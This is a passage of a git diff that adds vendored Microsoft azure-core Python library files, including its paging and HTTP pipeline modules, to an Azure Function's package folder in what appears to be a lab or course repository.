("subject", "eventType", "data", "dataVersion", "id", "eventTime")]): + raise ValueError( + "The event you are trying to parse follows the Eventgrid Schema. You can parse" + + " EventGrid events using EventGridEvent.from_dict method in the azure-eventgrid library." + ) + raise ValueError( + "The event does not conform to the cloud event spec https://github.com/cloudevents/spec." + + " The `source` and `type` params are required." + ) + return event_obj + + @classmethod + def from_json(cls, event): + # type: (Any) -> CloudEvent + """ + Returns the deserialized CloudEvent object when a json payload is provided. + :param event: The json string that should be converted into a CloudEvent. This can also be + a storage QueueMessage, eventhub's EventData or ServiceBusMessage + :type event: object + :rtype: CloudEvent + :raises ValueError: If the provided JSON is invalid. + """ + dict_event = _get_json_content(event) + return CloudEvent.from_dict(dict_event) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/paging.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/paging.py new file mode 100644 index 0000000..216938e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/paging.py @@ -0,0 +1,130 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import itertools +from typing import ( # pylint: disable=unused-import + Callable, + Optional, + TypeVar, + Iterator, + Iterable, + Tuple, +) +import logging + +from .exceptions import AzureError + + +_LOGGER = logging.getLogger(__name__) + +ReturnType = TypeVar("ReturnType") +ResponseType = TypeVar("ResponseType") + + +class PageIterator(Iterator[Iterator[ReturnType]]): + def __init__( + self, + get_next, # type: Callable[[Optional[str]], ResponseType] + extract_data, # type: Callable[[ResponseType], Tuple[str, Iterable[ReturnType]]] + continuation_token=None, # type: Optional[str] + ): + """Return an iterator of pages. + + :param get_next: Callable that take the continuation token and return a HTTP response + :param extract_data: Callable that take an HTTP response and return a tuple continuation token, + list of ReturnType + :param str continuation_token: The continuation token needed by get_next + """ + self._get_next = get_next + self._extract_data = extract_data + self.continuation_token = continuation_token + self._did_a_call_already = False + self._response = None # type: Optional[ResponseType] + self._current_page = None # type: Optional[Iterable[ReturnType]] + + def __iter__(self): + """Return 'self'.""" + return self + + def __next__(self): + # type: () -> Iterator[ReturnType] + if self.continuation_token is None and self._did_a_call_already: + raise StopIteration("End of paging") + try: + self._response = self._get_next(self.continuation_token) + except AzureError as error: + if not error.continuation_token: + error.continuation_token = self.continuation_token + raise + + self._did_a_call_already = True + + self.continuation_token, self._current_page = self._extract_data(self._response) + + return iter(self._current_page) + + next = __next__ # Python 2 compatibility. + + +class ItemPaged(Iterator[ReturnType]): + def __init__(self, *args, **kwargs): + """Return an iterator of items. + + args and kwargs will be passed to the PageIterator constructor directly, + except page_iterator_class + """ + self._args = args + self._kwargs = kwargs + self._page_iterator = None + self._page_iterator_class = self._kwargs.pop( + "page_iterator_class", PageIterator + ) + + def by_page(self, continuation_token: Optional[str] = None) -> Iterator[Iterator[ReturnType]]: + """Get an iterator of pages of objects, instead of an iterator of objects. + + :param str continuation_token: + An opaque continuation token. This value can be retrieved from the + continuation_token field of a previous generator object. If specified, + this generator will begin returning results from this point. + :returns: An iterator of pages (themselves iterator of objects) + """ + return self._page_iterator_class( + continuation_token=continuation_token, *self._args, **self._kwargs + ) + + def __repr__(self): + return "".format(hex(id(self))) + + def __iter__(self): + """Return 'self'.""" + return self + + def __next__(self) -> ReturnType: + if self._page_iterator is None: + self._page_iterator = itertools.chain.from_iterable(self.by_page()) + return next(self._page_iterator) + + next = __next__ # Python 2 compatibility. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__init__.py new file mode 100644 index 0000000..3192eda --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__init__.py @@ -0,0 +1,187 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import abc +from typing import TypeVar, Generic + +try: + ABC = abc.ABC +except AttributeError: # Python 2.7, abc exists, but not ABC + ABC = abc.ABCMeta("ABC", (object,), {"__slots__": ()}) # type: ignore + +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + +try: + from contextlib import ( # pylint: disable=unused-import + AbstractContextManager, + ) +except ImportError: # Python <= 3.5 + + class AbstractContextManager(object): # type: ignore + def __enter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + def __exit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + + +class PipelineContext(dict): + """A context object carried by the pipeline request and response containers. + + This is transport specific and can contain data persisted between + pipeline requests (for example reusing an open connection pool or "session"), + as well as used by the SDK developer to carry arbitrary data through + the pipeline. + + :param transport: The HTTP transport type. + :param kwargs: Developer-defined keyword arguments. + """ + _PICKLE_CONTEXT = { + 'deserialized_data' + } + + def __init__(self, transport, **kwargs): # pylint: disable=super-init-not-called + self.transport = transport + self.options = kwargs + self._protected = ["transport", "options"] + + def __getstate__(self): + state = self.__dict__.copy() + # Remove the unpicklable entries. + del state['transport'] + return state + + def __reduce__(self): + reduced = super(PipelineContext, self).__reduce__() + saved_context = {} + for key, value in self.items(): + if key in self._PICKLE_CONTEXT: + saved_context[key] = value + # 1 is for from __reduce__ spec of pickle (generic args for recreation) + # 2 is how dict is implementing __reduce__ (dict specific) + # tuple are read-only, we use a list in the meantime + reduced = list(reduced) + dict_reduced_result = list(reduced[1]) + dict_reduced_result[2] = saved_context + reduced[1] = tuple(dict_reduced_result) + return tuple(reduced) + + def __setstate__(self, state): + self.__dict__.update(state) + # Re-create the unpickable entries + self.transport = None + + def __setitem__(self, key, item): + # If reloaded from pickle, _protected might not be here until restored by pickle + # this explains the hasattr test + if hasattr(self, '_protected') and key in self._protected: + raise ValueError("Context value {} cannot be overwritten.".format(key)) + return super(PipelineContext, self).__setitem__(key, item) + + def __delitem__(self, key): + if key in self._protected: + raise ValueError("Context value {} cannot be deleted.".format(key)) + return super(PipelineContext, self).__delitem__(key) + + def clear(self): + """Context objects cannot be cleared. + + :raises: TypeError + """ + raise TypeError("Context objects cannot be cleared.") + + def update(self, *args, **kwargs): + """Context objects cannot be updated. + + :raises: TypeError + """ + raise TypeError("Context objects cannot be updated.") + + def pop(self, *args): + """Removes specified key and returns the value. + """ + if args and args[0] in self._protected: + raise ValueError("Context value {} cannot be popped.".format(args[0])) + return super(PipelineContext, self).pop(*args) + + +class PipelineRequest(Generic[HTTPRequestType]): + """A pipeline request object. + + Container for moving the HttpRequest through the pipeline. + Universal for all transports, both synchronous and asynchronous. + + :param http_request: The request object. + :type http_request: ~azure.core.pipeline.transport.HttpRequest + :param context: Contains the context - data persisted between pipeline requests. + :type context: ~azure.core.pipeline.PipelineContext + """ + + def __init__(self, http_request, context): + # type: (HTTPRequestType, PipelineContext) -> None + self.http_request = http_request + self.context = context + + +class PipelineResponse(Generic[HTTPRequestType, HTTPResponseType]): + """A pipeline response object. + + The PipelineResponse interface exposes an HTTP response object as it returns through the pipeline of Policy objects. + This ensures that Policy objects have access to the HTTP response. + + This also has a "context" object where policy can put additional fields. + Policy SHOULD update the "context" with additional post-processed field if they create them. + However, nothing prevents a policy to actually sub-class this class a return it instead of the initial instance. + + :param http_request: The request object. + :type http_request: ~azure.core.pipeline.transport.HttpRequest + :param http_response: The response object. + :type http_response: ~azure.core.pipeline.transport.HttpResponse + :param context: Contains the context - data persisted between pipeline requests. + :type context: ~azure.core.pipeline.PipelineContext + """ + + def __init__(self, http_request, http_response, context): + # type: (HTTPRequestType, HTTPResponseType, PipelineContext) -> None + self.http_request = http_request + self.http_response = http_response + self.context = context + + +from ._base import Pipeline # pylint: disable=wrong-import-position + +__all__ = ["Pipeline", "PipelineRequest", "PipelineResponse", "PipelineContext"] + +try: + from ._base_async import AsyncPipeline # pylint: disable=unused-import + + __all__.append("AsyncPipeline") +except (SyntaxError, ImportError): + pass # Asynchronous pipelines not supported. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..1ab3cc9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base.cpython-39.pyc new file mode 100644 index 0000000..e79139a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base_async.cpython-39.pyc new file mode 100644 index 0000000..d33a8eb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools.cpython-39.pyc new file mode 100644 index 0000000..0caf9ee Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools_async.cpython-39.pyc new file mode 100644 index 0000000..bc2e761 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base.py new file mode 100644 index 0000000..d293c71 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base.py @@ -0,0 +1,211 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +from typing import Generic, TypeVar, List, Union, Any, Dict +from azure.core.pipeline import ( + AbstractContextManager, + PipelineRequest, + PipelineResponse, + PipelineContext, +) +from azure.core.pipeline.policies import HTTPPolicy, SansIOHTTPPolicy +from ._tools import await_result as _await_result + +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") +HttpTransportType = TypeVar("HttpTransportType") + +_LOGGER = logging.getLogger(__name__) +PoliciesType = List[Union[HTTPPolicy, SansIOHTTPPolicy]] + + +class _SansIOHTTPPolicyRunner(HTTPPolicy): + """Sync implementation of the SansIO policy. + + Modifies the request and sends to the next policy in the chain. + + :param policy: A SansIO policy. + :type policy: ~azure.core.pipeline.policies.SansIOHTTPPolicy + """ + + def __init__(self, policy): + # type: (SansIOHTTPPolicy) -> None + super(_SansIOHTTPPolicyRunner, self).__init__() + self._policy = policy + + def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + """Modifies the request and sends to the next policy in the chain. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :return: The PipelineResponse object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ + _await_result(self._policy.on_request, request) + try: + response = self.next.send(request) + except Exception: # pylint: disable=broad-except + _await_result(self._policy.on_exception, request) + raise + else: + _await_result(self._policy.on_response, request, response) + return response + + +class _TransportRunner(HTTPPolicy): + """Transport runner. + + Uses specified HTTP transport type to send request and returns response. + + :param sender: The Http Transport instance. + """ + + def __init__(self, sender): + # type: (HttpTransportType) -> None + super(_TransportRunner, self).__init__() + self._sender = sender + + def send(self, request): + """HTTP transport send method. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :return: The PipelineResponse object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ + return PipelineResponse( + request.http_request, + self._sender.send(request.http_request, **request.context.options), + context=request.context, + ) + + +class Pipeline(AbstractContextManager, Generic[HTTPRequestType, HTTPResponseType]): + """A pipeline implementation. + + This is implemented as a context manager, that will activate the context + of the HTTP sender. The transport is the last node in the pipeline. + + :param transport: The Http Transport instance + :param list policies: List of configured policies. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sync.py + :start-after: [START build_pipeline] + :end-before: [END build_pipeline] + :language: python + :dedent: 4 + :caption: Builds the pipeline for synchronous transport. + """ + + def __init__(self, transport, policies=None): + # type: (HttpTransportType, PoliciesType) -> None + self._impl_policies = [] # type: List[HTTPPolicy] + self._transport = transport + + for policy in policies or []: + if isinstance(policy, SansIOHTTPPolicy): + self._impl_policies.append(_SansIOHTTPPolicyRunner(policy)) + elif policy: + self._impl_policies.append(policy) + for index in range(len(self._impl_policies) - 1): + self._impl_policies[index].next = self._impl_policies[index + 1] + if self._impl_policies: + self._impl_policies[-1].next = _TransportRunner(self._transport) + + def __enter__(self): + # type: () -> Pipeline + self._transport.__enter__() # type: ignore + return self + + def __exit__(self, *exc_details): # pylint: disable=arguments-differ + self._transport.__exit__(*exc_details) + + @staticmethod + def _prepare_multipart_mixed_request(request): + # type: (HTTPRequestType) -> None + """Will execute the multipart policies. + + Does nothing if "set_multipart_mixed" was never called. + """ + multipart_mixed_info = request.multipart_mixed_info # type: ignore + if not multipart_mixed_info: + return + + requests = multipart_mixed_info[0] # type: List[HTTPRequestType] + policies = multipart_mixed_info[1] # type: List[SansIOHTTPPolicy] + pipeline_options = multipart_mixed_info[3] # type: Dict[str, Any] + + # Apply on_requests concurrently to all requests + import concurrent.futures + + def prepare_requests(req): + if req.multipart_mixed_info: + # Recursively update changeset "sub requests" + Pipeline._prepare_multipart_mixed_request(req) + context = PipelineContext(None, **pipeline_options) + pipeline_request = PipelineRequest(req, context) + for policy in policies: + _await_result(policy.on_request, pipeline_request) + + with concurrent.futures.ThreadPoolExecutor() as executor: + # List comprehension to raise exceptions if happened + [ # pylint: disable=expression-not-assigned, unnecessary-comprehension + _ for _ in executor.map(prepare_requests, requests) + ] + + def _prepare_multipart(self, request): + # type: (HTTPRequestType) -> None + # This code is fine as long as HTTPRequestType is actually + # azure.core.pipeline.transport.HTTPRequest, bu we don't check it in here + # since we didn't see (yet) pipeline usage where it's not this actual instance + # class used + self._prepare_multipart_mixed_request(request) + request.prepare_multipart_body() # type: ignore + + def run(self, request, **kwargs): + # type: (HTTPRequestType, Any) -> PipelineResponse + """Runs the HTTP Request through the chained policies. + + :param request: The HTTP request object. + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The PipelineResponse object + :rtype: ~azure.core.pipeline.PipelineResponse + """ + self._prepare_multipart(request) + context = PipelineContext(self._transport, **kwargs) + pipeline_request = PipelineRequest( + request, context + ) # type: PipelineRequest[HTTPRequestType] + first_node = ( + self._impl_policies[0] + if self._impl_policies + else _TransportRunner(self._transport) + ) + return first_node.send(pipeline_request) # type: ignore diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base_async.py new file mode 100644 index 0000000..55fee32 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base_async.py @@ -0,0 +1,215 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc + +from typing import Any, Union, List, Generic, TypeVar, Dict + +from azure.core.pipeline import PipelineRequest, PipelineResponse, PipelineContext +from azure.core.pipeline.policies import AsyncHTTPPolicy, SansIOHTTPPolicy +from ._tools_async import await_result as _await_result + +AsyncHTTPResponseType = TypeVar("AsyncHTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") +ImplPoliciesType = List[ + AsyncHTTPPolicy[ # pylint: disable=unsubscriptable-object + HTTPRequestType, AsyncHTTPResponseType + ] +] +AsyncPoliciesType = List[Union[AsyncHTTPPolicy, SansIOHTTPPolicy]] + +try: + from contextlib import AbstractAsyncContextManager +except ImportError: # Python <= 3.7 + + class AbstractAsyncContextManager(object): # type: ignore + async def __aenter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + async def __aexit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + + +class _SansIOAsyncHTTPPolicyRunner( + AsyncHTTPPolicy[HTTPRequestType, AsyncHTTPResponseType] +): # pylint: disable=unsubscriptable-object + """Async implementation of the SansIO policy. + + Modifies the request and sends to the next policy in the chain. + + :param policy: A SansIO policy. + :type policy: ~azure.core.pipeline.policies.SansIOHTTPPolicy + """ + + def __init__(self, policy: SansIOHTTPPolicy) -> None: + super(_SansIOAsyncHTTPPolicyRunner, self).__init__() + self._policy = policy + + async def send(self, request: PipelineRequest) -> PipelineResponse: + """Modifies the request and sends to the next policy in the chain. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :return: The PipelineResponse object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ + await _await_result(self._policy.on_request, request) + try: + response = await self.next.send(request) # type: ignore + except Exception: # pylint: disable=broad-except + if not await _await_result(self._policy.on_exception, request): + raise + else: + await _await_result(self._policy.on_response, request, response) + return response + + +class _AsyncTransportRunner( + AsyncHTTPPolicy[HTTPRequestType, AsyncHTTPResponseType] +): # pylint: disable=unsubscriptable-object + """Async Transport runner. + + Uses specified HTTP transport type to send request and returns response. + + :param sender: The async Http Transport instance. + """ + + def __init__(self, sender) -> None: + super(_AsyncTransportRunner, self).__init__() + self._sender = sender + + async def send(self, request): + """Async HTTP transport send method. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :return: The PipelineResponse object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ + return PipelineResponse( + request.http_request, + await self._sender.send(request.http_request, **request.context.options), + request.context, + ) + + +class AsyncPipeline( + AbstractAsyncContextManager, Generic[HTTPRequestType, AsyncHTTPResponseType] +): + """Async pipeline implementation. + + This is implemented as a context manager, that will activate the context + of the HTTP sender. + + :param transport: The async Http Transport instance. + :param list policies: List of configured policies. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START build_async_pipeline] + :end-before: [END build_async_pipeline] + :language: python + :dedent: 4 + :caption: Builds the async pipeline for asynchronous transport. + """ + + def __init__(self, transport, policies: AsyncPoliciesType = None) -> None: + self._impl_policies = [] # type: ImplPoliciesType + self._transport = transport + + for policy in policies or []: + if isinstance(policy, SansIOHTTPPolicy): + self._impl_policies.append(_SansIOAsyncHTTPPolicyRunner(policy)) + elif policy: + self._impl_policies.append(policy) + for index in range(len(self._impl_policies) - 1): + self._impl_policies[index].next = self._impl_policies[index + 1] + if self._impl_policies: + self._impl_policies[-1].next = _AsyncTransportRunner(self._transport) + + async def __aenter__(self) -> "AsyncPipeline": + await self._transport.__aenter__() + return self + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + await self._transport.__aexit__(*exc_details) + + async def _prepare_multipart_mixed_request(self, request: HTTPRequestType) -> None: + """Will execute the multipart policies. + + Does nothing if "set_multipart_mixed" was never called. + """ + multipart_mixed_info = request.multipart_mixed_info # type: ignore + if not multipart_mixed_info: + return + + requests = multipart_mixed_info[0] # type: List[HTTPRequestType] + policies = multipart_mixed_info[1] # type: List[SansIOHTTPPolicy] + pipeline_options = multipart_mixed_info[3] # type: Dict[str, Any] + + async def prepare_requests(req): + if req.multipart_mixed_info: + # Recursively update changeset "sub requests" + await self._prepare_multipart_mixed_request(req) + context = PipelineContext(None, **pipeline_options) + pipeline_request = PipelineRequest(req, context) + for policy in policies: + await _await_result(policy.on_request, pipeline_request) + + # Not happy to make this code asyncio specific, but that's multipart only for now + # If we need trio and multipart, let's reinvesitgate that later + import asyncio + + await asyncio.gather(*[prepare_requests(req) for req in requests]) + + async def _prepare_multipart(self, request: HTTPRequestType) -> None: + # This code is fine as long as HTTPRequestType is actually + # azure.core.pipeline.transport.HTTPRequest, bu we don't check it in here + # since we didn't see (yet) pipeline usage where it's not this actual instance + # class used + await self._prepare_multipart_mixed_request(request) + request.prepare_multipart_body() # type: ignore + + async def run(self, request: HTTPRequestType, **kwargs: Any): + """Runs the HTTP Request through the chained policies. + + :param request: The HTTP request object. + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The PipelineResponse object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ + await self._prepare_multipart(request) + context = PipelineContext(self._transport, **kwargs) + pipeline_request = PipelineRequest(request, context) + first_node = ( + self._impl_policies[0] + if self._impl_policies + else _AsyncTransportRunner(self._transport) + ) + return await first_node.send(pipeline_request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools.py new file mode 100644 index 0000000..c881914 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools.py @@ -0,0 +1,63 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import TYPE_CHECKING + +if TYPE_CHECKING: + from typing import Any + from azure.core.rest import HttpResponse as RestHttpResponse + +def await_result(func, *args, **kwargs): + """If func returns an awaitable, raise that this runner can't handle it.""" + result = func(*args, **kwargs) + if hasattr(result, "__await__"): + raise TypeError( + "Policy {} returned awaitable object in non-async pipeline.".format(func) + ) + return result + +def is_rest(obj): + # type: (Any) -> bool + """Return whether a request or a response is a rest request / response. + + Checking whether the response has the object content can sometimes result + in a ResponseNotRead error if you're checking the value on a response + that has not been read in yet. To get around this, we also have added + a check for is_stream_consumed, which is an exclusive property on our new responses. + """ + return hasattr(obj, "is_stream_consumed") or hasattr(obj, "content") + +def handle_non_stream_rest_response(response): + # type: (RestHttpResponse) -> None + """Handle reading and closing of non stream rest responses. + For our new rest responses, we have to call .read() and .close() for our non-stream + responses. This way, we load in the body for users to access. + """ + try: + response.read() + response.close() + except Exception as exc: + response.close() + raise exc diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools_async.py new file mode 100644 index 0000000..a235243 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools_async.py @@ -0,0 +1,49 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import TYPE_CHECKING +if TYPE_CHECKING: + from ..rest import AsyncHttpResponse as RestAsyncHttpResponse + + +async def await_result(func, *args, **kwargs): + """If func returns an awaitable, await it.""" + result = func(*args, **kwargs) + if 